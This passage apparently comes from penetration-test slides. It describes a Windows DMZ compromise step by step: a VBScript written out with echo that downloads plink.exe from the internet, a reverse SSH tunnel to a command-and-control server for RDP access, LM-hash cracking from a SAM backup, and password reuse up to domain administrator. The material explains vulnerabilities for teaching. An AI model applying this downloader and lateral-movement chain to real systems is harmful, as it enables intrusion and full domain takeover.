  • 58. Penetration test example To create the tunnel, I need to download a SSH Client on the Server using DOS command prompt I create a VBSCRIPT script using « Echo » command, then execute the VBSCRIPT Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs Cscript dl.vbs Use plink to create the tunnel dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", "http://www.putty.com/plink.exe", False xHttp.Send with bStrm .type = 1 '//binary .open .write xHttp.responseBody .savetofile "c:tempplink.exe", 2 '//overwrite end with
  • 59. Penetration test example Web ServersC&C SERVER – PORT 80 Port 3389 SSH SERVER – PORT 443 Reverse SSH TUNNEL / Port 443  Connect to RDP through the tunnel and use the user account I just created to connect temptest password
  • 60. Penetration test example  Next Step -> Lateral Movement – the simplest first, credentials reuse  I need to crack all passwords present locally on the infected server  Vuln 6/7: Windows 2003 Design Vulnerabilities  VULN 6: « Repair » file contains a SAM backup file containing encrypted credentials using LMHASH  VULN: LMHASH encryption algorithm is broken and can be cracked easily
  • 61. Penetration test example  After some minutes
  • 62. Penetration test example  VULN 8: Local Administrator password is replicated over all systems in the DMZ Web ServersC&C SERVER – PORT 80 Port 3389 SSH SERVER – PORT 443 Reverse SSH TUNNEL / Port 443 Web Servers Web Servers Web Servers Port 3389
  • 63. Penetration test example  Next-Step: Try to hit Internal Network  VULN 9 : DMZ Systems members of Internal Windows Domain. Means that critical ports ( e.g. 139, 445, … ) must be open between DMZ and Internal network  VULN 10 : Password Replication Bis – A Domain Admin user account whose name is identical has a local account has the same password
  • 64. Penetration test example  I connect to the Domain Controller from the DMZ using the Domain Admin account. I am now Domain Administrator and has full control over the Enterprise Domain Web Servers Ports 80 (HTTP) et 443 (HTTPS) DMZ Intranet Domaine Windows d’Entreprise Contrôleur de Domaine Domain Controller